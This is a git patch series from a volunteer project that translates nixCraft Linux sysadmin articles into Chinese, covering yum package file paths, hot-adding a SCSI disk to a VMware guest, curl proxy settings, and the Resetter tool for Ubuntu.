MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... is package installed to on CentOS-RHEL.md | 159 +++++++++++++++++-
1 file changed, 158 insertions(+), 1 deletion(-)
diff --git a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index a5d548eae1..770b2cbe05 100644
--- a/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/translated/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -1 +1,158 @@
-在 CentOS/RHEL 上查找 yum 安裝软件的位置
======
我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
1. 操作系统内核更新
2. 软件包更新
3. 安装新的软件包
4. 删除旧的软件包
5. 查找已安装和可用的软件包
和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
### yum 安装软件包的位置
我们以安装 htop 为例:
```
# yum install htop
```
使用以下命令列出 yum 安装 htop 的文件:
```
# rpm -q {packageNameHere}
# rpm -ql htop
```
输出例子:
```
/usr/bin/htop
/usr/share/doc/htop-2.0.2
/usr/share/doc/htop-2.0.2/AUTHORS
/usr/share/doc/htop-2.0.2/COPYING
/usr/share/doc/htop-2.0.2/ChangeLog
/usr/share/doc/htop-2.0.2/README
/usr/share/man/man1/htop.1.gz
/usr/share/pixmaps/htop.png
```
### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
首先使用 [yum 命令][2] 安装 yum-utils 软件包:
```
# yum install yum-utils
```
例子输出:
```
Resolving Dependencies
--> Running transaction check
---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
--> Running transaction check
---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
=======================================================================================
Package Arch Version Repository Size
=======================================================================================
Installing:
yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
Installing for dependencies:
libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
Transaction Summary
=======================================================================================
Install 1 Package (+2 Dependent packages)
Total download size: 630 k
Installed size: 3.1 M
Is this ok [y/d/N]: y
Downloading packages:
(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
---------------------------------------------------------------------------------------
Total 1.0 MB/s | 630 kB 00:00
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
Installing : yum-utils-1.1.31-42.el7.noarch 3/3
Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
Installed:
yum-utils.noarch 0:1.1.31-42.el7
Dependency Installed:
libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
Complete!
```
### 如何列出通过 yum 安装的命令?
使用 repoquery 命令:
`# repoquery --list htop`
或者
`# repoquery -l htop`
例子输出:
[![yum where is package installed][5]][5]
你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
```
$ type -a httpd
$ type -a htop
$ command -V htop
```
### 关于作者
作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
--------------------------------------------------------------------------------
via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
作者:[][a]
译者:[译者 ID](https://github.com/cyleung)
校对:[校对者 ID](https://github.com/ 校对者 ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
[a]:https://www.cyberciti.biz
[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
[6]:https://twitter.com/nixcraft
[7]:https://facebook.com/nixcraft
[8]:https://plus.google.com/+CybercitiBiz
\ No newline at end of file
+在 CentOS/RHEL 上查找 yum 安裝软件的位置
+======
+
+我已经在 CentOS/RHEL 上[安装 htop][1] 。现在想知道软件被安装在哪个位置。有没有简单的方法能找到软件包安装的目录呢?
+
+[yum 命令][2] 是可交互的,开源的,基于 rpm 的 CentOS/RHEL 的软件包管理工具。它会帮助你自动地完成以下操作:
+
+ 1. 操作系统内核更新
+ 2. 软件包更新
+ 3. 安装新的软件包
+ 4. 删除旧的软件包
+ 5. 查找已安装和可用的软件包
+
+和 yum 相似的软件包管理工具有: [apt-get command][3] 和 [apt command][4]。
+
+### yum 安装软件包的位置
+
+我们以安装 htop 为例:
+
+```
+# yum install htop
+```
+
+
+使用以下命令列出 yum 安装 htop 的文件:
+
+```
+# rpm -q {packageNameHere}
+# rpm -ql htop
+```
+
+输出例子:
+
+```
+/usr/bin/htop
+/usr/share/doc/htop-2.0.2
+/usr/share/doc/htop-2.0.2/AUTHORS
+/usr/share/doc/htop-2.0.2/COPYING
+/usr/share/doc/htop-2.0.2/ChangeLog
+/usr/share/doc/htop-2.0.2/README
+/usr/share/man/man1/htop.1.gz
+/usr/share/pixmaps/htop.png
+
+```
+
+### 如何使用 repoquery 命令查看 yum 安装的软件包的位置
+
+首先使用 [yum 命令][2] 安装 yum-utils 软件包:
+
+```
+# yum install yum-utils
+```
+
+例子输出:
+
+```
+Resolving Dependencies
+--> Running transaction check
+---> Package yum-utils.noarch 0:1.1.31-42.el7 will be installed
+--> Processing Dependency: python-kitchen for package: yum-utils-1.1.31-42.el7.noarch
+--> Processing Dependency: libxml2-python for package: yum-utils-1.1.31-42.el7.noarch
+--> Running transaction check
+---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
+---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
+--> Finished Dependency Resolution
+
+Dependencies Resolved
+
+=======================================================================================
+ Package Arch Version Repository Size
+=======================================================================================
+Installing:
+ yum-utils noarch 1.1.31-42.el7 rhui-rhel-7-server-rhui-rpms 117 k
+Installing for dependencies:
+ libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
+ python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
+
+Transaction Summary
+=======================================================================================
+Install 1 Package (+2 Dependent packages)
+
+Total download size: 630 k
+Installed size: 3.1 M
+Is this ok [y/d/N]: y
+Downloading packages:
+(1/3): python-kitchen-1.1.1-5.el7.noarch.rpm | 266 kB 00:00:00
+(2/3): libxml2-python-2.9.1-6.el7_2.3.x86_64.rpm | 247 kB 00:00:00
+(3/3): yum-utils-1.1.31-42.el7.noarch.rpm | 117 kB 00:00:00
+---------------------------------------------------------------------------------------
+Total 1.0 MB/s | 630 kB 00:00
+Running transaction check
+Running transaction test
+Transaction test succeeded
+Running transaction
+ Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
+ Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
+ Installing : yum-utils-1.1.31-42.el7.noarch 3/3
+ Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
+ Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
+ Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
+
+Installed:
+ yum-utils.noarch 0:1.1.31-42.el7
+
+Dependency Installed:
+ libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
+
+Complete!
+```
+
+### 如何列出通过 yum 安装的命令?
+
+使用 repoquery 命令:
+
+`# repoquery --list htop`
+
+或者
+
+`# repoquery -l htop`
+
+例子输出:
+
+[![yum where is package installed][5]][5]
+
+你也可以使用 type 命令或者 command 命令查找指定二进制文件的位置,例如 httpd 或者 htop :
+
+
+```
+$ type -a httpd
+$ type -a htop
+$ command -V htop
+```
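+
+(以下为补充示例,并非原文内容:如果想反过来查询某个文件是由哪个软件包安装的,可以使用 `rpm -qf` 或 `yum provides`,这里的 `/usr/bin/htop` 沿用上文的例子。)
+
+```
+# rpm -qf /usr/bin/htop
+# yum provides /usr/bin/htop
+```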
+
+### 关于作者
+
+作者是 nixCraft 的创始人,是经验丰富的系统管理员并且是 Linux 命令行脚本编程的教练。他拥有全球多行业合作的经验,客户包括 IT,教育,安防和空间研究。他的联系方式:[Twitter][6], [Facebook][7], [Google+][8]。
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/faq/yum-determining-finding-path-that-yum-package-installed-to/
+
+作者:[][a]
+译者:[译者 ID](https://github.com/cyleung)
+校对:[校对者 ID](https://github.com/ 校对者 ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux 中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/faq/centos-redhat-linux-install-htop-command-using-yum/
+[2]:https://www.cyberciti.biz/faq/rhel-centos-fedora-linux-yum-command-howto/ (See Linux/Unix yum command examples for more info)
+[3]:https://www.cyberciti.biz/tips/linux-debian-package-management-cheat-sheet.html (See Linux/Unix apt-get command examples for more info)
+[4]:https://www.cyberciti.biz/faq/ubuntu-lts-debian-linux-apt-command-examples/ (See Linux/Unix apt command examples for more info)
+[5]:https://www.cyberciti.biz/media/new/faq/2018/01/yum-where-is-package-installed.jpg
+[6]:https://twitter.com/nixcraft
+[7]:https://facebook.com/nixcraft
+[8]:https://plus.google.com/+CybercitiBiz
+
+
From e7cc7f6c63efe588d95143aead0332145483648c Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 16:01:00 +0800
Subject: [PATCH 171/371] translate done: 20090718 Vmware Linux Guest Add a New
Hard Disk Without Rebooting Guest.md
---
...a New Hard Disk Without Rebooting Guest.md | 105 +++++++++---------
1 file changed, 52 insertions(+), 53 deletions(-)
rename {sources => translated}/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md (64%)
diff --git a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
similarity index 64%
rename from sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
rename to translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
index 0845866f51..6c57fd9090 100644
--- a/sources/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
+++ b/translated/tech/20090718 Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest.md
@@ -1,76 +1,75 @@
-translating by lujun9972
-
-Vmware Linux Guest Add a New Hard Disk Without Rebooting Guest
+在不重启的情况下为 Vmware Linux 客户机添加新硬盘
======
-As a system admin, I need to use additional hard drives for to provide more storage space or to separate system data from user data. This procedure, adding physical block devices to virtualized guests, describes how to add a hard drive on the host to a virtualized guest using VMWare software running Linux as guest.
+作为一名系统管理员,我经常需要用额外的硬盘来扩充存储空间,或将系统数据与用户数据分离。本文介绍的是将物理块设备添加到虚拟化客户机的过程:如何把宿主机上的一块硬盘,添加到一台使用 VMWare 软件虚拟化的 Linux 客户机上。
-It is possible to add or remove a SCSI device explicitly, or to re-scan an entire SCSI bus without rebooting a running Linux VM guest. This how to is tested under Vmware Server and Vmware Workstation v6.0 (but should work with older version too). All instructions are tested on RHEL, Fedora, CentOS and Ubuntu Linux guest / hosts operating systems.
+你可以显式地添加或删除一个 SCSI 设备,或者重新扫描整个 SCSI 总线,而不用重启 Linux 虚拟机。本指南在 Vmware Server 和 Vmware Workstation v6.0 中通过测试(更老的版本应该也支持)。所有命令在 RHEL、Fedora、CentOS 和 Ubuntu Linux 客户机/主机操作系统下都经过了测试。
-## Step # 1: Add a New Disk To Vm Guest
+## 步骤 # 1:添加新硬盘到虚拟客户机
-First, you need to add hard disk by visiting vmware hardware settings menu.
-Click on VM > Settings
+首先,通过 vmware 硬件设置菜单添加硬盘。
+点击 VM > Settings
-![Fig.01: Vmware Virtual Machine Settings ][1]
+![Fig.01:Vmware Virtual Machine Settings ][1]
-Alternatively you can press CTRL + D to bring settings dialog box.
+或者你也可以按下 CTRL + D 也能进入设置对话框。
-Click on Add+ to add new hardware to guest:
+点击 Add+ 添加新硬盘到客户机:
-![Fig.02: VMWare adding a new hardware][2]
+![Fig.02:VMWare adding a new hardware][2]
+
+选择硬件类型为 Hard disk 然后点击 Next
-Select hardware type Hard disk and click on Next
![Fig.03 VMware Adding a new disk wizard ][3]
-Select create a new virtual disk and click on Next
+选择 `create a new virtual disk` 然后点击 Next
-![Fig.04: Vmware Wizard Disk ][4]
+![Fig.04:Vmware Wizard Disk ][4]
-Set virtual disk type to SCSI and click on Next
+设置虚拟磁盘类型为 SCSI 然后点击 Next
-![Fig.05: Vmware Virtual Disk][5]
+![Fig.05:Vmware Virtual Disk][5]
-Set maximum disk size as per your requirements and click on Next
+按需要设置最大磁盘大小,然后点击 Next
-![Fig.06: Finalizing Disk Virtual Addition ][6]
+![Fig.06:Finalizing Disk Virtual Addition ][6]
-Finally, set file location and click on Finish.
+最后,选择文件存放位置然后点击 Finish。
-## Step # 2: Rescan the SCSI Bus to Add a SCSI Device Without rebooting the VM
+## 步骤 # 2:重新扫描 SCSI 总线,在不重启虚拟机的情况下添加 SCSI 设备
-A rescan can be issued by typing the following command:
+输入下面命令重新扫描 SCSI 总线:
```
-echo "- - -" > /sys/class/scsi_host/ **host#** /scan
+echo "- - -" > /sys/class/scsi_host/host# /scan
fdisk -l
tail -f /var/log/messages
```
-Sample outputs:
+输出为:
![Linux Vmware Rescan New Scsi Disk Without Reboot][7]
-Replace host# with actual value such as host0. You can find scsi_host value using the following command:
+你需要将 `host#` 替换成真实的值,比如 host0。你可以通过下面命令来查出这个值:
`# ls /sys/class/scsi_host`
-Output:
+输出:
```
host0
```
-Now type the following to send a rescan request:
+然后输入下面的命令来请求重新扫描:
```
-echo "- - -" > /sys/class/scsi_host/ **host0** /scan
+echo "- - -" > /sys/class/scsi_host/host0/scan
fdisk -l
tail -f /var/log/messages
```
-Sample Outputs:
+输出为:
```
Jul 18 16:29:39 localhost kernel: Vendor: VMware, Model: VMware Virtual S Rev: 1.0
@@ -109,33 +108,33 @@ Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi disk sdc
Jul 18 16:29:39 localhost kernel: sd 0:0:2:0: Attached scsi generic sg2 type 0
```
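
(补充示意,并非原文内容:如果系统中有多个 SCSI 主机适配器,也可以用下面这样一个简单的循环把它们全部重新扫描一遍,需要 root 权限。)

```
## 遍历所有 SCSI 主机适配器并触发重新扫描 ##
for host in /sys/class/scsi_host/host*; do
  echo "- - -" > "$host/scan"
done
```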
-### How Do I Delete a Single Device Called /dev/sdc?
+### 如何删除 `/dev/sdc` 这块设备?
-In addition to re-scanning the entire bus, a specific device can be added or existing device deleted using the following command:
+除了重新扫描整个总线外,你也可以使用下面命令添加或删除指定磁盘:
```
# echo 1 > /sys/block/devName/device/delete
-# echo 1 > /sys/block/ **sdc** /device/delete
+# echo 1 > /sys/block/sdc/device/delete
```
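
(补充示意,并非原文内容:在删除设备前后,可以用 `lsblk` 确认内核是否还能看到这块磁盘,`sdc` 沿用上文的例子。)

```
# lsblk
# echo 1 > /sys/block/sdc/device/delete
# lsblk
```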
-### How Do I Add a Single Device Called /dev/sdc?
+### 如何添加 `/dev/sdc` 这块设备?
-To add a single device explicitly, use the following syntax:
+使用下面语法添加指定设备:
```
# echo "scsi add-single-device " > /proc/scsi/scsi
```
-Where,
+这里,
- * : Host
- * : Bus (Channel)
- * : Target (Id)
- * : LUN numbers
+ * :Host
+ * :Bus (Channel)
+ * :Target (Id)
+ * :LUN numbers
-For e.g. add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
+例如,使用参数 host#0、bus#0、target#2 以及 LUN#0 来添加 /dev/sdc,则输入:
```
# echo "scsi add-single-device 0 0 2 0">/proc/scsi/scsi
@@ -143,7 +142,7 @@ For e.g. add /dev/sdc with host # 0, bus # 0, target # 2, and LUN # 0, enter:
# cat /proc/scsi/scsi
```
-Sample Outputs:
+结果输出:
```
Attached devices:
@@ -158,9 +157,9 @@ Host: scsi0 Channel: 00 Id: 02 Lun: 00
Type: Direct-Access ANSI SCSI revision: 02
```
-## Step #3: Format a New Disk
+## 步骤 #3:格式化新磁盘
-Now, you can create partition using [fdisk and format it using mkfs.ext3][8] command:
+现在使用 [fdisk 并通过 mkfs.ext3][8] 命令创建分区:
```
# fdisk /dev/sdc
@@ -170,39 +169,39 @@ Now, you can create partition using [fdisk and format it using mkfs.ext3][8] com
# mkfs.ext4 /dev/sdc3
```
-## Step #4: Create a Mount Point And Update /etc/fstab
+## 步骤 #4:创建挂载点并更新 /etc/fstab
`# mkdir /disk3`
-Open /etc/fstab file, enter:
+打开 /etc/fstab 文件,输入:
`# vi /etc/fstab`
-Append as follows:
+加入下面这行:
```
/dev/sdc3 /disk3 ext3 defaults 1 2
```
-For ext4 fs:
+若是 ext4 文件系统则加入:
```
/dev/sdc3 /disk3 ext4 defaults 1 2
```
-Save and close the file.
+保存并关闭文件。
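+
+(补充示例,并非原文步骤:写好 /etc/fstab 之后,可以直接挂载新分区并确认结果,这里的 /disk3 沿用上文的挂载点。)
+
+```
+# mount /disk3
+# df -h /disk3
+```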
-#### Optional Task: Label the partition
+#### 可选操作:为分区加标签
-[You can label the partition using e2label command][9]. For example, if you want to label the new partition /backupDisk, enter
+[你可以使用 e2label 命令为分区加标签][9]。例如,若想给新分区加上 /backupDisk 这个标签,则输入:
`# e2label /dev/sdc1 /backupDisk`
-See "[The importance of Linux partitions][10]
+详情参见“[Linux 分区的重要性][10]”。
-## about the author
+## 关于作者
-The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][11], [Facebook][12], [Google+][13].
+作者既是 nixCraft 的创造者,也是一名经验丰富的系统管理员,还是 Linux 操作系统/Unix shell 脚本培训师。他曾服务过全球客户并与多个行业合作过,包括 IT、教育、国防和空间研究,以及非盈利机构。你可以在 [Twitter][11]、[Facebook][12]、[Google+][13] 上关注他。
--------------------------------------------------------------------------------
From 6203fd62b767454039a262a19490333e6f6b1815 Mon Sep 17 00:00:00 2001
From: darksun
Date: Mon, 8 Jan 2018 16:25:06 +0800
Subject: [PATCH 172/371] translate done: 20160117 How to use curl command with
proxy username-password on Linux- Unix.md
---
... proxy username-password on Linux- Unix.md | 50 +++++++++----------
1 file changed, 24 insertions(+), 26 deletions(-)
rename {sources => translated}/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md (64%)
diff --git a/sources/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md b/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
similarity index 64%
rename from sources/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
rename to translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
index ecc95d8432..8e3e1dae81 100644
--- a/sources/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
+++ b/translated/tech/20160117 How to use curl command with proxy username-password on Linux- Unix.md
@@ -1,8 +1,8 @@
translating by lujun9972
-How to use curl command with proxy username/password on Linux/ Unix
+如何让 curl 命令通过代理访问
======
-My sysadmin provided me the following proxy details:
+我的系统管理员给我提供了如下代理信息:
```
IP: 202.54.1.1
Port: 3128
@@ -10,15 +10,14 @@ Username: foo
Password: bar
```
-The settings worked perfectly with Google Chrome and Firefox browser. How do I use it with the curl command? How do I tell the curl command to use my proxy settings from Google Chrome browser?
+这些设置在 Google Chrome 和 Firefox 浏览器上工作得很好。但是我要怎么把它们应用到 curl 命令上呢?我要如何让 curl 命令使用我在 Google Chrome 浏览器上的代理设置呢?
+
+很多 Linux 和 Unix 命令行工具(比如 curl 命令,wget 命令,lynx 命令等)使用名为 `http_proxy`,`https_proxy`,`ftp_proxy` 的环境变量来获取代理信息。它允许你通过代理服务器(使用或不使用用户名/密码都行)来连接那些基于文本的会话和应用。**本文就会演示一下如何让 curl 通过代理服务器发送 HTTP/HTTPS 请求。**
+
+## 让 curl 命令使用代理的语法
-Many Linux and Unix command line tools such as curl command, wget command, lynx command, and others; use the environment variable called http_proxy, https_proxy, ftp_proxy to find the proxy details. It allows you to connect text based session and applications via the proxy server with or without a userame/password. T **his page shows how to perform HTTP/HTTPS requests with cURL cli using PROXY server.**
-
-## Unix and Linux curl command with proxy syntax
-
-
-The syntax is:
+语法为:
```
## Set the proxy address of your uni/company/vpn network ##
export http_proxy=http://your-ip-address:port/
@@ -32,7 +31,7 @@ export https_proxy=https://user:password@your-proxy-ip-address:port/
```
-Another option is to pass the -x option to the curl command. To use the specified proxy:
+另一种方法是使用 curl 命令的 -x 选项:
```
curl -x <[protocol://][user:password@]proxyhost[:port]> url
--proxy <[protocol://][user:password@]proxyhost[:port]> url
@@ -40,9 +39,9 @@ curl -x <[protocol://][user:password@]proxyhost[:port]> url
-x http://user:password@Your-Ip-Here:Port url
```
-## Linux use curl command with proxy
+## 在 Linux 上的一个例子
-First set the http_proxy:
+首先设置 `http_proxy`:
```
## proxy server, 202.54.1.1, port: 3128, user: foo, password: bar ##
export http_proxy=http://foo:bar@202.54.1.1:3128/
@@ -51,7 +50,7 @@ export https_proxy=$http_proxy
curl -I https://www.cyberciti.biz
curl -v -I https://www.cyberciti.biz
```
-Sample outputs:
+输出为:
```
* Rebuilt URL to: www.cyberciti.biz/
@@ -98,44 +97,43 @@ Connection: keep-alive
* Connection #0 to host 10.12.249.194 left intact
```
-
-In this example, I'm downloading a pdf file:
+本例中,我来下载一个 pdf 文件:
```
$ export http_proxy="vivek:myPasswordHere@10.12.249.194:3128/"
$ curl -v -O http://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-OR use the -x option:
+也可以使用 -x 选项:
```
curl -x 'http://vivek:myPasswordHere@10.12.249.194:3128' -v -O https://dl.cyberciti.biz/pdfdownloads/b8bf71be9da19d3feeee27a0a6960cb3/569b7f08/cms/631.pdf
```
-Sample outputs:
-[![Fig.01: curl in action \(click to enlarge\)][1]][2]
+输出为:
+![Fig.01:curl in action \(click to enlarge\)][1]
-## How to use the specified proxy server with curl on Unix
+## Unix 上的一个例子
```
$ curl -x http://prox_server_vpn:3128/ -I https://www.cyberciti.biz/faq/howto-nginx-customizing-404-403-error-page/
```
-## How to use socks protocol?
+## socks 协议怎么办呢?
-The syntax is same:
+语法也是一样的:
```
curl -x socks5://[user:password@]proxyhost[:port]/ url
curl --socks5 192.168.1.254:3099 https://www.cyberciti.biz/
```
-## How do I configure and setup curl to permanently use a proxy connection?
+## 如何让代理设置永久生效?
-Update/edit your ~/.curlrc file using a text editor such as vim:
+编辑 ~/.curlrc 文件:
`$ vi ~/.curlrc`
-Append the following:
+添加下面内容:
```
proxy = server1.cyberciti.biz:3128
proxy-user = "foo:bar"
```
-Save and close the file. Another option is create a bash shell alias in your ~/.bashrc file:
+保存并关闭该文件。另一种方法是在你的 `~/.bashrc` 文件中创建一个别名:
```
## alias for curl command
## set proxy-server and port, the syntax is
@@ -143,7 +141,7 @@ Save and close the file. Another option is create a bash shell alias in your ~/.
alias curl = "curl -x server1.cyberciti.biz:3128"
```
-Remember, the proxy string can be specified with a protocol:// prefix to specify alternative proxy protocols. Use socks4://, socks4a://, socks5:// or socks5h:// to request the specific SOCKS version to be used. No protocol specified, http:// and all others will be treated as HTTP proxies. If the port number is not specified in the proxy string, it is assumed to be 1080. The -x option overrides existing environment variables that set the proxy to use. If there's an environment variable setting a proxy, you can set proxy to "" to override it. See curl command man page [here for more info][3].
+记住,代理字符串中可以使用 `protocol://` 前缀来指定不同的代理协议。使用 `socks4://`、`socks4a://`、`socks5://` 或者 `socks5h://` 来指定所使用的 SOCKS 版本。若没有指定协议,或者指定的是 `http://` 及其它未被识别的前缀,都会被当作 HTTP 代理。若没有指定端口号,则默认为 1080。`-x` 选项的值会覆盖环境变量中设置的代理。若环境变量中设置了代理而你又不想使用它,可以把代理设置为 "" 来覆盖。[详细信息请参阅 curl 的 man 页][3]。
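+
+(下面是两个补充示例,并非原文内容,其中的地址和端口仅为示意:第一条通过 `socks5h://` 前缀使用本机 9050 端口上的 SOCKS5 代理并由代理解析域名;第二条把代理设置为 "" 来忽略环境变量中的代理。)
+
+```
+curl -x socks5h://127.0.0.1:9050 -I https://www.cyberciti.biz/
+curl --proxy "" -I https://www.cyberciti.biz/
+```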
--------------------------------------------------------------------------------
From 29107bc8922e4748022a1590e4f8b44bce817635 Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 18:46:55 +0800
Subject: [PATCH 173/371] PRF:20171229 Set Ubuntu Derivatives Back to Default
with Resetter.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@stevenzdg988 要注意使用中文标点,并注意 MD 格式。最好提交之前预览一下 md 的渲染样式。
---
...rivatives Back to Default with Resetter.md | 125 ++++++++----------
1 file changed, 56 insertions(+), 69 deletions(-)
diff --git a/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md b/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
index bc5d6a09d6..3fd3768d6e 100644
--- a/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
+++ b/translated/tech/20171229 Set Ubuntu Derivatives Back to Default with Resetter.md
@@ -1,128 +1,115 @@
-translated by stevenzdg988
-
-利用 Resetter 将 Ubuntu 衍生版重置为初始状态
+利用 Resetter 将 Ubuntu 系发行版重置为初始状态
======
-有多少次你投入到Ubuntu(或Ubuntu衍生版本),配置某项内容和安装软件,却发现你的桌面(或服务器)平台并不是你想要的。当在机器上产生了大量的用户文件时,这种情况可能会出现问题。既然这样,你有一个选择,你或者可以备份你所有的数据,重新安装操作系统,然后将您的数据复制回本机,或者也可以利用一种类似于[Resetter][1]的工具做同样的事情。
-Resetter 是一个新的工具(由加拿大开发者,被称为"[gaining][2]"),用python和PyQt,将重置Ubuntu,Linux Mint(和一些其他的,基于Ubuntu的衍生版)回到初始配置。Resetter 提供了两种不同的复位选项:自动和自定义。利用自动选项,工具就会完成以下内容:
- * 删除用户安装的应用软件
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/resetter_0.png?itok=YEX5IGdx)
- * 删除用户及家目录
+*这个 Resetter 工具可以将 Ubuntu、 Linux Mint (以及其它基于 Ubuntu 的发行版)返回到其初始配置。*
- * 创建默认备份用户
+有多少次你投身于 Ubuntu(或 Ubuntu 衍生版本),配置某项内容和安装软件,却发现你的桌面(或服务器)平台并不是你想要的结果。当在机器上产生了大量的用户文件时,这种情况可能会出现问题。既然这样,你有一个选择,你要么可以备份你所有的数据,重新安装操作系统,然后将您的数据复制回本机,或者也可以利用一种类似于 [Resetter][1] 的工具做同样的事情。
- * 自动安装预装的应用软件(MPIAs)
+Resetter 是一个新的工具(由名为“[gaining][2]”的加拿大开发者开发),用 Python 和 PyQt 编写,它将会重置 Ubuntu、Linux Mint(和一些其他的,基于 Ubuntu 的衍生版)回到初始配置。Resetter 提供了两种不同的复位选择:自动和自定义。利用自动方式,工具就会完成以下内容:
- * 删除非默认用户
+* 删除用户安装的应用软件
+* 删除用户及家目录
+* 创建默认备份用户
+* 自动安装缺失的预装应用软件(MPIA)
+* 删除非默认用户
+* 删除 snap 软件包
- * 删除协议软件包
+自定义方式会:
-自定义选项:
+* 删除用户安装的应用程序或者允许你选择要删除的应用程序
+* 删除旧的内核
+* 允许你选择用户进行删除
+* 删除用户及家目录
+* 创建默认备份用户
+* 允许您创建自定义备份用户
+* 自动安装缺失的预装应用软件(MPIA)或选择 MPIA 进行安装
+* 删除非默认用户
+* 查看所有相关依赖包
+* 删除 snap 软件包
- * 删除用户安装的应用程序或者允许你选择要删除的应用程序
+我将带领您完成安装和使用 Resetter 的过程。但是,我必须告诉你,这个工具还处于非常早期的测试阶段。即便如此,Resetter 绝对值得一试。实际上,我鼓励您测试该应用程序并提交 bug 报告(您可以通过 [GitHub][3] 提交,或者直接发送到开发人员的电子邮件地址 [gaining7@outlook.com][4])。
- * 删除旧的内核
+还应注意的是,目前仅支持的衍生版有:
- * 允许你选择用户进行删除
+* Debian 9.2 (稳定)Gnome 版本
